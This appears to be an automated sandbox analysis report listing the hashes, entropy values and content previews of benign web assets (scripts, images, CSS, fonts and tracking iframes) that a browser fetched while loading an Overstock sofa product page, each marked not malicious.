                                                                                                                                                                                    Size (bytes):3608633
                                                                                                                                                                                    Entropy (8bit):5.414357943359161
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:YnOJUrdZ7j+oNoE0ehD2vByjVEJYJGrZ9RlyMkI2c+OC5yXJSMg4uz8ScBoRqw+n:YnOJ4dZ7j+BsUBYLFr1+Vz
                                                                                                                                                                                    MD5:1367EC6BCEA28D77689E2995E2B71DB8
                                                                                                                                                                                    SHA1:144F4F22979918F5DB2CF60A118F4FEA38D1FD7B
                                                                                                                                                                                    SHA-256:49BA964EA36DB57F8E32159349953B7E0FA79DB8F0D383D98DAD59766BD08838
                                                                                                                                                                                    SHA-512:AFCEF01F3B199D36104B00A3EBE7E06BE31C3056C15B9E15D2686B0AAABB5248B406D051D3ABDDD43F97CDD3D94CF4F61AEAAEDF36F02099C89B2AFBDB30FEFB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/products/mia-oversized-modular-sectional-fabric-sofa-38169103?variant=50892052725919&searchidx=0
                                                                                                                                                                                    Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. localization: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/products/mia-oversized-modular-sectional-fabric-sofa-38169103").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):47594
                                                                                                                                                                                    Entropy (8bit):7.988587116443477
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:VoBZN6cC5KGB5FNw7xkVIYzpOxezsvKUhem2CTew9Grnn922khnVI9iezDQBb6:VocHNwqDzIKUhem28mn9LcVMiYeb6
                                                                                                                                                                                    MD5:52DE4EE277871ACEB1852D6E6F41C281
                                                                                                                                                                                    SHA1:10FF7AAC351EEFB9D157270A6CBF059043DEC6F5
                                                                                                                                                                                    SHA-256:8ADB0DF8DE5D632A7A038487CC8040F6BC0D295B6B5BDAE232E0B43BDCDCAB0E
                                                                                                                                                                                    SHA-512:A44619B20FCD6F41F1A416C266DA6BC0D562D8EFAE22D7744D739163ABFCD1F17D96DF1ED25CA70F0B0AB565C7A90CF10C98D59CCF0CCFF1E092D675EB4307D9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/collections/Untitled_design_19.png?v=1729289161&width=800
                                                                                                                                                                                    Preview:RIFF...WEBPVP8X....(...K.....ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 R........*L...>=..D"!."(WI.@..ci..:.U...D.../.+.FQ.".3..M..$..^;.._.........r..^..?+.w.O........G.7.?......o.?......3......v..................'.W.......~..........o.......>........{........??.t?....4.%.[...G.O...}...~....D.............?......_.............?...~......e._....{...u.......>.~............1...?...~\...a...G...?..t>.?3..p?....W..`.o>....7.....>7..._..k?.{..A.........?.</?).C.........=.................e...+...O....*>z?....M............E.......u...Q.s.K...=....G.{.Ue7.)'..?.,.\.<G....W2k...(....U&89ksQ%.^Ch..0.p
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2020)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2132
                                                                                                                                                                                    Entropy (8bit):5.410644401574348
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:MKQhST64UYFBi233zt46wWASm9uGLfWWdl89NoYbkKKsXiZacadDSrhqcwFOKCpg:YC6p4i23326UtLuKdkyKFV0s7xNv
                                                                                                                                                                                    MD5:B847331248ACA291BB011B831B9CC0B5
                                                                                                                                                                                    SHA1:B9255D676FE8D59EDE449AC8CFEDD5A4C5CFDEB0
                                                                                                                                                                                    SHA-256:06F8FC6E21097DEAF1CAA113DE5A24E10797700E8D71B40C5802B88BFACD13B5
                                                                                                                                                                                    SHA-512:73A27D71ED1A313C709627AC8C1E35F8DC963473C74BBE570272DB23D49A4449B90E85980F255D7A2EF5B49FA77658319D44B83FE09C51320808A1925ED95A07
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/featured-collection-vsearch.js?v=56585624430427458651730157903
                                                                                                                                                                                    Preview:window.VSEARCH_UTILS=function(){const requires=["products"],ranges=["price"],restrictions=["brand","promotion"],nonFacetKeys=["q","page","selectedSort","maxPerPage","taxonomyId"];function buildAttributes(input){const attributes={};return Object.keys(input).forEach(key=>{!restrictions.includes(key)&&!ranges.includes(key)&&!nonFacetKeys.includes(key)&&(attributes[key]={id:key,values:Array.isArray(input[key])?input[key]:[input[key]]})}),attributes}function getDeviceType(){const userAgent=navigator.userAgent.toLowerCase();return/mobile|android|iphone|ipod|blackberry|iemobile|opera mini/i.test(userAgent)||window.innerWidth<=600?"MOBILE_WEB":"DESKTOP"}function sanitize(url){const parser=document.createElement("a");parser.href=url;const protocol="https:",host=parser.host.replace(/[^a-zA-Z0-9.-]/g,""),pathname=parser.pathname.replace(/[^a-zA-Z0-9\/._-]/g,""),search=parser.search.replace(/[^a-zA-Z0-9&=_-]/g,"");return`${protocol}//${host}${pathname}${search}`}return{prepareRequestBodyParams:fun
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1848
                                                                                                                                                                                    Entropy (8bit):6.9973883414128055
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:lIl/XflCgfjN1E7wQIh1/BSIXurpof70pnk9sfIlA:lIl/X5fxC7wdh1/BatoTThA
                                                                                                                                                                                    MD5:CC29007F8C5A38F7C9BAF282712AE5A5
                                                                                                                                                                                    SHA1:AE4317A7C64FE3F59610AB2391A2AF7A47FE2EAC
                                                                                                                                                                                    SHA-256:F0A061F22C4DD87B9FEC12CD2527101FBCC535AD2E6718B94731849AC11F95D8
                                                                                                                                                                                    SHA-512:C2A9CE3A8B83AFB44CBC0657DC3CB85042E230D082C7D6208AB5553E36BF550C6F5DF83F63A07EF1C1BDE6D8BCF38AE6EC2517A23491735E37054A574D305F4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_3780cf42-a447-4211-be22-df58b81cbf46.jpg?v=1729323108&width=80
                                                                                                                                                                                    Preview:RIFF0...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..C"!!..^P .......{. _'...;....0..?.....7...?h.0}.?s.(+"8..o..Fi.b..-L`..Vxzp.Vy....T.<.K.l.)....n.qxC...>6.2..E..e...Oa....H.u.F..0.>o"....Z.k......_.._.i..`.6w.cX<.U.5J......P.4.....Z5c..X0...L..r..............E.o.?.....x.o).......Z..1a.b\"....._.E.... .X..(...d..[...5...k....I.._.H..^....tK.+..C...+3.C.N<.:.Q.2...,.<J.Sz.... .-.k.+_.....;=..k][...C...BP.Dz.......u*.=p.F..p6....,.._....}_....7..o..%.A.4H.P....-`.&.~!..W;......9.......9..I.~qd...*..y.Q#6z(.j.J..4.fK.!9.{.n.*..kJ....*..7..6
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):28
                                                                                                                                                                                    Entropy (8bit):3.9677201004744997
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:TBOvinunTkYn:TBORR
                                                                                                                                                                                    MD5:FAF139090912AC003A060DF1B5828084
                                                                                                                                                                                    SHA1:33D29AC56560C81D2AC3F7F26A85FE538F45480E
                                                                                                                                                                                    SHA-256:0BED53CA6342BD8135DAB0564C71CD02B21B66624DA1B051DD27A4B41D79D13A
                                                                                                                                                                                    SHA-512:FB5B7D3735466240EF5A72D653CC039BD78BC29C042CFB46B19C4ADBD9AF9887EF07BCFE2DD7FAED28ACB6225AE794B26141EFCEF067A53A5086868E84CC26F0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwliMg5LH_vHIxIFDXCu2QkSBQ2thKMM?alt=proto
                                                                                                                                                                                    Preview:ChIKBw1wrtkJGgAKBw2thKMMGgA=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):24244
                                                                                                                                                                                    Entropy (8bit):7.964844624310942
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:H1Rc8X+kVkjSik2lIrRWYnK0CDyuTrHR8z8Kcm6xdM8oEQfq38tX8me:VR1ukVkLlI0eKdDyfgPbxNcve
                                                                                                                                                                                    MD5:3E090CC1E5B2BAAC73EF46480C1CCF76
                                                                                                                                                                                    SHA1:8928AB5A13CBA030B81B8BF3CD25409EFBED10FC
                                                                                                                                                                                    SHA-256:DB87DDADB7E7D86BF493B4C67B7752166F750661ADCD7303A72DF8204749077D
                                                                                                                                                                                    SHA-512:14D0D1DE2E55A5DA6D7A0CB59159D1546963851F6CB49FC782D140B54CB92568484C2C13A8102943E8E0178ED48867008770E657808DA0D0A9C7576812489D0D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_e25e0449-1203-486e-a473-112cb2ea564f.jpg?v=1729322908&width=640
                                                                                                                                                                                    Preview:RIFF.^..WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .\...w...*....>=..D.!...d. ...p....e........h*....y.}..?.w........V.._....*...a.......).N..w..~....m..3_......Q..~....?.......a......>...h...YPG......k*....Q..2-eA....4W.E..#.[.F.....|.|(.\......o..+.".T..-.EpdZ.>...h...YPG......k*....Q..2-eA....4W.E..#.[.F.....|.|(.\......o..+.".T..-.EpdZ.>...h...YPG......k*....Q..2-eA....4W.E..#.[.F.....|.|(.\......o..+.!.w...No..+.".T..-.Em.kt[6..U.]...D>. ..r%j.&h.g......)D89.....]l&u.m........(...0.*.P..9&.|.S|...~..Z..h..S.x..Oz.J..W.x...&....<..yP..,.AB..*......q..u...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1500
                                                                                                                                                                                    Entropy (8bit):6.703405857136352
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:k5TCIl/X2YlXWI2PUXhQoa87WLKNtcvGLk7S1aIgHqr0RkFo0cdFs+:3Il/XflIojtE70UqI+a0cfs+
                                                                                                                                                                                    MD5:97CDA2E3AE27219C8D9CC5F0BC52707A
                                                                                                                                                                                    SHA1:164EADE641404E810B125E7BF4FBBC2313E428F8
                                                                                                                                                                                    SHA-256:A9CB5FDF0B50438A88AF0E15BD53DBD4E0AE9ECB2F7C94B2770AC016B7CEADE1
                                                                                                                                                                                    SHA-512:A4F39B6CFB205C4F539A4CF87E2E281CEA62C6193CC2A676F688072BD3B572BAA8F63F2867CD34091564BCD85FD0DBA0B83EFA526EE2D3CE807D202880C061F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_df9a2294-12ce-44b9-ba04-ee4e912e879e.jpg?v=1729325111&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 D........*P.P.>1..C"!!.zN. ....j.......g>O..._._y]1......>.....^V..{a.G......L..........?....`.a.R.f.C.y&.+p.6..j.JC.......g..6....S..._.R&1.@....x..._.....}.Zr.......)OU...Y.1...<s].yv.Dd....k.~...Nmf...,V@..+x.iO..........i.....+y......u.n.f..r>c...2....&.|~...h....HGe.>.h...u..}..q[C....R.{....sr....A<.~"o.a.o}.et.*...p...\.'.....B2.7....e..tA6..`..M.p.K..!.S..2....F.n....1....'...h.1...."Pp...,T....U...:.5a.iP.....=...........M&R..T.J..GO.|j....@..x...}N..4.......x....o...P..H2..@..P.h(.X.RU{/...y..<.....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (565), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):565
                                                                                                                                                                                    Entropy (8bit):5.013395369899308
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:hR2zGkAIrR/+RRa2OXnlEceA9uJ33+SGf6bGEo3G1ONOI:hR26arh+R8xXeclk+h6vo2qOI
                                                                                                                                                                                    MD5:433CBAC690542626F503B4269A8DA12A
                                                                                                                                                                                    SHA1:3E810BC4ABACCF42AC5E4B0B939D63C03711BBD9
                                                                                                                                                                                    SHA-256:F83B1A3EA61AD62E47FAD82DE5495A2547E2F12E591AD8108050538C566AE1E3
                                                                                                                                                                                    SHA-512:569B3D704F2A979D16624064ABD3B97F38EEA3C9A5F3F09D31C9B83D62C360717F6F66EE44A6B53686760421A57D7EB4ABD54904556B105B05AA81D5850F34B9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ct.pinterest.com/ct.html
                                                                                                                                                                                    Preview:<!DOCTYPE html><html lang="en"><head><title>Pinterest ct</title></head><body><div id="root"></div><script>window.addEventListener("message", (event) => {if (event.origin != "https://www.pinterest.com") {return;}try {if (event.data.key == "_epik_localstore") {window.localStorage.setItem(event.data.key, event.data.value);}} catch (error) {}}, false);window.addEventListener("load", (event) => {try {window.parent.postMessage({ key: "_epik_localstore", value: window.localStorage.getItem("_epik_localstore") }, "*")} catch (error) {}}, false);</script></body></html>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (2998), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6842
                                                                                                                                                                                    Entropy (8bit):5.675689226174819
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:5i6LVdAWhrY113pKkLVKuktIasDaIXAw28ZxAf8F3Oa:5iwVOZHkWasPXC8/4aOa
                                                                                                                                                                                    MD5:69816E45F49922AB2284E9EC7D954A94
                                                                                                                                                                                    SHA1:A633F9B734AB54BCFF0553CEFA9A075F99ED1051
                                                                                                                                                                                    SHA-256:238954B1DAF0341FB8B4A798CDA95B052CD18232F3B164B8856409E1ECD17D21
                                                                                                                                                                                    SHA-512:0C2F267B30017CA76EE80A9AAF5395D82B0A13A2865AEFAB27C1C0F95C1821E997EC8ADB019ED1A707FB3E3D5499CB0C5245798040EA199B0116D90F1AF7CF37
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://fledge.us.criteo.com/interest-group?data=UUk7Rnxsdmh4eXY3QVppMm16UzEvcnBiaU5kdXIzNnBIcDFjODBPaFJTcUFCUGRINU1XY0R6eENweEtUcXM4d1MxK3plQW9pbWQwYnFLNGtHaW1FSk1PVVhabVBqcEkwOTFmY3djRzUwZVplSnBMST18
                                                                                                                                                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <title>Fledge IFrame</title>..</head>..<body>....<script>.. function getBswIg(src) {.. const elt = document.createElement("iframe");.. elt.allow = "join-ad-interest-group";.. elt.width = "0";.. elt.height = "0";.. elt.style.display = "none";.. elt.title = "BSW IG";.. elt.src = src;.... document.body.appendChild(elt);.. }.... if (!navigator.joinAdInterestGroup) {.. console.log("No fledge for you!");.. } else {.. var igs =[{"owner":"https://fledge.us.criteo.com","name":"0DE64HxtMWxCd05OY0tNRk16ZjZSTWNxTHFnPT18","lifetimeMs":2592000000,"priorityVector":{"browserSignals.ageInMinutes":-1,"browserSignals.one":86400},"biddingLogicURL":"https://fledge.us.criteo.com/simplebid?platform=us","biddingWasmHelperURL":"https://fledge.us.criteo.com/criteo.wasm","trustedBiddingSignalsURL":"https://fledge.us.criteo.com/getvalues","trustedBiddingSignalsKeys":["Y85qt3xweFZBVXR1NX
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1968
                                                                                                                                                                                    Entropy (8bit):6.580848214982491
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:rGP/jwvIl/XflAetYhJF7OHN5GFu0PznCpT572w/JjojzucZb:rGzwvIl/XuKYj9OY4xX/JjuVb
                                                                                                                                                                                    MD5:28F9CEB2D02D42FEB59E8D789ED206CB
                                                                                                                                                                                    SHA1:BF3F2D763CE8EDE3918D9B41042F736249B4B996
                                                                                                                                                                                    SHA-256:9FD60A5BE8AE5A892671079EDE99F0314847BA9AEB759379CF16AC682AABD630
                                                                                                                                                                                    SHA-512:4D32203E89C40F3DA0D44885F78F1C24502C9A91CF2E01065ECC1C941920CBA91DA35BDE04290F922E5A20818EDB12AE6E2857F08A0B7C7F574425C7A935C38D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_6db86274-3d18-497d-95d6-c16f638ac225.jpg?v=1729325318&width=80
                                                                                                                                                                                    Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@.........................................8iinf..........infe........av01.....infe........Exif.....iprp....ipco....colrrICC....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.............av1C........ispe.......P...P....pixi............ipma...................iref........cdsc..........mdat........d...B2.........+<.~..33.h.y_..[......j......u.. d<..vZ........O...=..C..+........O6J.z.......O_v.9$;..B.....3.?....(....8.U.Z.......g.D.Z......<....*.}S.,..'....z..".H.E...MP.....>.....w.(.."'9..R..-L.....5..57..Y...yav.]...BH.1.r
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (11481)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):11579
                                                                                                                                                                                    Entropy (8bit):5.090747284388086
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:RaqhvCOeD4Bd20OZRD208Kwlqlns/NyTkmIN16SxXxkGyx1BNXa/ogENqxW9YbI5:RaqhqZKGk7U0yTw5tyPBNq/ogENqxZM5
                                                                                                                                                                                    MD5:54D2095858C4D114A9417C57C618C727
                                                                                                                                                                                    SHA1:8FB513592C16FE4C1836FECD1B9BF9B59522CD61
                                                                                                                                                                                    SHA-256:A776B67DDA997CD1FF511D346B82E37342722D545A3E302B9A67776365589333
                                                                                                                                                                                    SHA-512:9A3F0F6A2291E52D7D1BD2A1F521FB3EF2C1D0BA504B2C1EB31F59E02DA6C3CA1CE61CE8E8F3E6F52E68B5ABC54F48A81522833CC36CA6EE770E42AF73BEA685
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/media-gallery.js?v=77420666937621654651730157903
                                                                                                                                                                                    Preview:if(!customElements.get("media-gallery")){class MediaGallery extends HTMLElement{constructor(){super(),Shopify.designMode?setTimeout(()=>this.init(),200):this.init()}disconnectedCallback(){window.removeEventListener("on:debounced-resize",this.resizeHandler),this.resizeInitHandler&&window.removeEventListener("on:debounced-resize",this.resizeInitHandler),this.zoomInitHandler&&window.removeEventListener("on:debounced-resize",this.zoomInitHandler)}init(){this.section=this.closest(".js-product"),this.mediaGroupingEnabled=this.hasAttribute("data-media-grouping-enabled")&&this.getMediaGroupData(),this.stackedScroll=this.dataset.stackedScroll,this.stackedUnderline=this.dataset.stackedUnderline==="true"&&!this.mediaGroupingEnabled,this.isFeatured=this.dataset.isFeatured==="true",this.viewer=this.querySelector(".media-viewer"),this.thumbs=this.querySelector(".media-thumbs"),this.thumbsItems=this.querySelectorAll(".media-thumbs__item"),this.controls=this.querySelector(".media-ctrl"),this.prevBtn=t
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):32034
                                                                                                                                                                                    Entropy (8bit):7.962872373995671
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:PJOjDHJJ6vpe5i6LbUbrNwJuGEqrp7EG5/SJPd0dwJrsRlb2FzkgppINB8cN:PuDHJJ6MXmrNKaqNn5/6F0KrsRliFTr+
                                                                                                                                                                                    MD5:682A0EDDE95588E6CC1D80D1666C7CD1
                                                                                                                                                                                    SHA1:BE16A93510B9D13530E499B6710493F094243FC6
                                                                                                                                                                                    SHA-256:3EBA522FF13BE5E32D5CC3BBDFD5DD72A42E4CFDCA652E04A756C00EA1CE6EF5
                                                                                                                                                                                    SHA-512:6831D4E2E8820952B12362D8EBC4B52BB81B663EE95088589BCD7E10DE5D0201A7C62332E1ACC418A7F5ED32DE94C1E06EB90200F99CBD48C0C096C1E407C10A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.........................................................................................P....r[..=........v.l6.W.B..........d....9..M5......;..)C.Lo.k..Y_..)U....6....V;...+5g..$.w....*...9..O/....isq.&..\4..9
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (30843), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):30843
                                                                                                                                                                                    Entropy (8bit):4.922944355229106
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:cKqPCv2/aLiTlwCF4FLF5B7EGVm4Gm48XFCi4qi4ozFmbTbwb/pm4Apm48pXFgpI:kCvmlGCaWJffLTHWIW0vDjrqS9Z7QA
                                                                                                                                                                                    MD5:4EFFD8F300881B3F9551527B4B83E8BF
                                                                                                                                                                                    SHA1:F19880CD1DB274E0931E7AE2F68B3917CB5B678C
                                                                                                                                                                                    SHA-256:044D3ED69CA7AF62DAF496AC669ECCAB443AC96B6338BEE29D9DA882FDAFAF6F
                                                                                                                                                                                    SHA-512:6EF7737D61CF4908054E506FB4C32AB913AF4325A05F854FDBC566B677418B414E643AD98521DCDA33BC91C0716B65DEB8442F966D3C503ED0025D01B64FAC22
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/homepage/_next/static/css/ad6fb076e0e5cbef.css
                                                                                                                                                                                    Preview:.title-lg,.title-md,.title-sm,.title-uppercase,.title-xl,.title-xs,.title-xxl,.title-xxs,.title-xxxl{color:#2f3337;font-family:Helvetica Neue,Helvetica,Arial,sans-serif;line-height:1.2}.body-large,.body-regular,.body-small{color:#545658;font-family:Helvetica Neue,Helvetica,Arial,sans-serif;line-height:1.5}.title-xxxl{font-size:36px}.title-xxl{font-size:32px}.title-xl{font-size:28px}.title-lg{font-size:24px}.title-md{font-size:20px}.title-sm{font-size:18px}.body-large,.title-xs{font-size:16px}.body-regular,.title-uppercase,.title-xxs{font-size:14px}.body-small{font-size:12px}.title-uppercase{font-weight:500;text-transform:uppercase}.bold-weight{font-weight:700}.uppercase{font-weight:500;text-transform:uppercase}.cl-button-disabled,.cl-button:disabled,.cl-pages .cl-arrow:disabled{opacity:.7}.cl-rating{align-items:center;display:flex;position:relative}.cl-rating-fixed-sm{max-width:55px}.cl-rating-fixed-md{max-width:80px}.cl-rating-front{max-width:100%;overflow:hidden;position:absolute;top
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 37924, version 1.0
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):37924
                                                                                                                                                                                    Entropy (8bit):7.994431354445107
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:DAk5xDH4kyFt0jChelNKeq4vnkWEsUX3qrUJEOjO:DAkXb4Ft0jewieEsYqvOjO
                                                                                                                                                                                    MD5:BF2CFFAD0EB579C9502F9EAFDFF6B7A1
                                                                                                                                                                                    SHA1:32E120FAB9D7481F0E875A11E4FA2A498C83CA67
                                                                                                                                                                                    SHA-256:F7EF618F98F4522CB2497B14D30C6A77060EE0638587D014DB98792234BA7F56
                                                                                                                                                                                    SHA-512:FB05DE4CB731A1188C83194DCAC0AFC062888117EC0B0BF397040F65EE46A40812D8D6472D2E1955FC779511032A340A10D59D7B9CAF2DEC3C0D1A57233C175A
                                                                                                                                                                                    Malicious:false
